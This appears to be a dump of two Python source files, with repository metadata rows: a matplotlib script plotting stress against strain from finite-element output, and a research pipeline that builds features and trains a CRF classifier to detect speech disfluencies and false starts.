import matplotlib.pylab as plt
import sys
import numpy as np;
################ Node # 2 Displacement #############################
#######################################
## Analytical Solution
#######################################
finput = h5py.File('Analytical_Solution.feioutput')
plt.figure()
# Read the time and displacement
times = finput["time"][:]
normal_strain = finput["/Model/Elements/Element_Outputs"][6,:]
normal_stress = -finput["/Model/Elements/Element_Outputs"][9,:];
# plt.plot(normal_strain,normal_stress,'-r',Linewidth=4,label='Analytical Solution')
plt.hold(True)
#######################################
## Current Solution
#######################################
# Go over each feioutput and plot each one.
thefile = "Monotonic_Contact_Behaviour_Adding_Normal_Load.h5.feioutput";
finput = h5py.File(thefile)
# Read the time and displacement
times = finput["time"][:]
normal_strain = finput["/Model/Elements/Element_Outputs"][6,:]
normal_stress = -finput["/Model/Elements/Element_Outputs"][9,:];
# Configure the figure filename, according to the input filename.
outfig=thefile.replace("_","-")
outfigname=outfig.replace("h5.feioutput","pdf")
# Plot the figure. Add labels and titles.
plt.plot(normal_strain, normal_stress, '-k', linewidth=4, label='Numerical Solution')
plt.xlabel(r"Normal Strain $\epsilon$")
plt.ylabel(r"Normal Stress $\sigma$")
plt.legend()
plt.savefig("Contact_Normal_Interface_Behavour.pdf", bbox_inches='tight')
# plt.show()
# #####################################################################
| cc0-1.0 | 8,658,133,854,043,327,000 | 29.480769 | 84 | 0.60694 | false |
linkinwong/word2vec | src/crf-paper-script/preprocessor9_complete_ngram.py | 1 | 8544 | # coding: utf-8
__author__ = 'linlin'
import os
import logging
import re
import pdb
import string
logger = logging.getLogger(__name__)
################################################################
root_dir = '/home/linlin/time/0903_classify_false_start/1003_raw_features/'
separator = '\t\t'
################################################################
def MakeNewFolderVersionHigher(data_directory, dir_name):
    ## Create a folder with a higher version number inside the chosen directory. data_directory - can be a relative directory
    ## dir_name - the new folder name you want to create
abs_data_directory = os.path.abspath(os.path.dirname(data_directory))
version_number = 1
dirs = os.listdir(abs_data_directory)
for dir in dirs:
if dir_name in dir:
version_str = re.findall(r'Dir_\d+',dir)
number_str =''.join((version_str[-1])[4:])
if True == number_str.isdigit():
number= int (number_str)
if number>version_number:
version_number = number
new_folder_name = dir_name + "_%d" %(version_number+1)
folderFullPath = os.path.join(abs_data_directory,new_folder_name )
os.makedirs(folderFullPath)
return folderFullPath
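# Hedged example (the path is a placeholder and nothing in this script calls
# this helper). Note the trailing slash, mirroring how root_dir is defined
# above: os.path.dirname() strips it, so the versioned folder is created inside
# '/tmp/experiment' itself. With 'processDir_1' already present there, the call
# creates and returns '/tmp/experiment/processDir_2'.
def ExampleMakeVersionedFolder():
    return MakeNewFolderVersionHigher('/tmp/experiment/', 'processDir')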
#########################################################
output_root_dir = MakeNewFolderVersionHigher(root_dir, 'processDir' )
data_dir = root_dir + 'data4'
code_dir = root_dir + 'src/'
##############################################################
def DirProcessing(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
Standardize(abs_file_path, dest_path, ' ')
def DirProcessingForSSR(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
GetSsrFeature(abs_file_path, dest_path, '\t')
def GetAttributes(source_path, dest_path):
################################################################
script_file = code_dir + 'chunker9_complete_2gram.py'
################################################################
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
abs_file_path = os.path.join(root, filespath)
logger.debug("Visited one file!")
crf_path = dest_path + '/' + os.path.basename(abs_file_path) + '.crfsuite'
os.system('cat ' + abs_file_path +' | python ' + script_file + " > " + crf_path )
def RunClassifier(source_path, dest_path):
path = source_path
for root, dirs, files in os.walk(path):
for filespath in files:
if 'tr.txt' in filespath:
train_path = os.path.join(root, filespath)
elif 'te.txt' in filespath:
test_path = os.path.join(root, filespath)
#pdb.set_trace()
result_path = dest_path + '/' + 'result.txt'
os.system('crfsuite learn -e2 ' + train_path + " " + test_path + " > " + result_path )
def FindNeighborTokenSubscript(first_token_list, current_pos , up_or_down ):
pos = current_pos
ind = up_or_down
li = first_token_list
if ind == 1:
i = 1
while len(li[pos+i]) < 1:
i += 1
return pos+i
if ind == -1:
i = 1
while len(li[pos-i]) < 1:
i += 1
return pos-i
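# Small self-check (not called anywhere): empty strings play the role of blank
# lines, so from position 3 the previous non-empty token is at index 1 and the
# next one is at index 5.
def ExampleFindNeighbor():
    tokens = ['a', 'b', '', 'c', '', 'd']
    prev_idx = FindNeighborTokenSubscript(tokens, 3, -1)    # -> 1
    next_idx = FindNeighborTokenSubscript(tokens, 3, 1)     # -> 5
    return prev_idx, next_idx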
def Standardize(path, dest_dir, sep):
output_path = dest_dir+ '/' + os.path.basename(path) + '.standard'
output_file_obj = open(output_path,'w')
file_obj = open(path)
line_list = file_obj.readlines()
token_list = []
for j in range(len(line_list)):
word_list = line_list[j].split()
if len(word_list) < 2:
token_list.append('')
else:
token_list.append(word_list[0])
repetition_vec_list = []
for i in range(len(line_list)):
if len(token_list[i]) == 0:
repetition_vec_list.append('')
else:
if i < 4 or i > len(line_list)- 5:
repetition_vec_list.append(['diff', 'diff','diff', 'diff'])
else:
previous_subscript = FindNeighborTokenSubscript(token_list, i, -1)
prev_prev_subscript = FindNeighborTokenSubscript(token_list, previous_subscript, -1)
next_subscript = FindNeighborTokenSubscript(token_list, i, 1)
next_next_subscript = FindNeighborTokenSubscript(token_list, next_subscript, 1)
prev_prev_label = 'same' if (token_list[i] == token_list[prev_prev_subscript]) else "diff"
prev_label = 'same' if (token_list[i] == token_list[previous_subscript]) else "diff"
next_label = 'same' if (token_list[i] == token_list[next_subscript]) else "diff"
                next_next_label = 'same' if (token_list[i] == token_list[next_next_subscript]) else "diff"
                repetition_vec_list.append([prev_prev_label, prev_label, next_label, next_next_label])
for k in range(len(line_list)):
line = line_list[k]
if len(line)<13:
label = ''
else:
word_list = line.split()
if 'filler' in word_list[4]:
label = 'filler'
elif 'repeat' in word_list[4] or 'nsert' in word_list[4]:
label = 'repeat'
elif 'restart' in word_list[4] or 'extraneou' in word_list[4]:
label = 'false_start'
elif 'elete' in word_list[4]:
label = 'other'
else:
label = 'OK'
if '-' in word_list[0]:
patial = 'patial'
else:
patial = 'nonpatial'
label = label
token = word_list[0]
pos = word_list[1]
word = word_list[2]
sem = word_list[3]
patial = patial
#pdb.set_trace()
pp = repetition_vec_list[k][0]
p = repetition_vec_list[k][1]
n = repetition_vec_list[k][2]
nn = repetition_vec_list[k][3]
ng2 = 'ng2:'+ str( -1 * string.atof(word_list[5]))
#ng2 = 'ng2:'+ word_list[5]
# ng3 = 'ng3:'+ word_list[11]
# ng4 = 'ng4:'+ word_list[12]
# ng3pr = 'ng3pr:'+ word_list[13]
#pdb.set_trace()
if len(line)<13:
line_format = ''
else:
line_format = (
"%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
%(label, sep, token,sep,pos, sep,word,sep,sem, sep, patial, sep,
pp, sep, p, sep, n,sep, nn, sep, ng2))
output_file_obj.write(line_format)
output_file_obj.write('\n')
output_file_obj.close()
file_obj.close()
def GetSsrFeature(path, dest_dir, sep):
output_path = dest_dir+ '/' + os.path.basename(path) + '.noSpace'
output_file_obj = open(output_path,'w')
file_obj = open(path)
for line in file_obj:
if len(line)<3:
newLine = ''
else:
word_list = line[54:].split()
newLine = '_'.join(word_list)
token = line[:15].strip()
pos = line[15:25].strip()
word = line[25:40].strip()
sem = line[40:54].strip()
label = newLine
if len(line)<3:
line_format = ''
else:
line_format = "%s%s%s%s%s%s%s%s%s%s" %(token,sep,pos,sep,word,sep,sem, sep, label, sep)
output_file_obj.write(line_format)
output_file_obj.write('\n')
output_file_obj.close()
file_obj.close()
if __name__ == '__main__':
logFile = output_root_dir + "/logFile.txt"
logging.basicConfig(filename=logFile, level = logging.DEBUG)
os.makedirs(output_root_dir + "/standardStep1")
dest_dir = output_root_dir + "/standardStep1"
DirProcessing(data_dir, dest_dir)
# os.makedirs(output_root_dir + "/standardStep2") #
# dest_dir = output_root_dir + "/standardStep2"
# DirProcessing(data_dir, dest_dir) #
os.makedirs(output_root_dir + "/attributesStep3")
attr_dir = output_root_dir + "/attributesStep3"
GetAttributes(dest_dir, attr_dir)
os.makedirs(output_root_dir + "/classificationStep4")
result_dir = output_root_dir + "/classificationStep4"
RunClassifier( attr_dir, result_dir)
| apache-2.0 | -2,062,712,346,878,222,600 | 32.620553 | 110 | 0.533388 | false |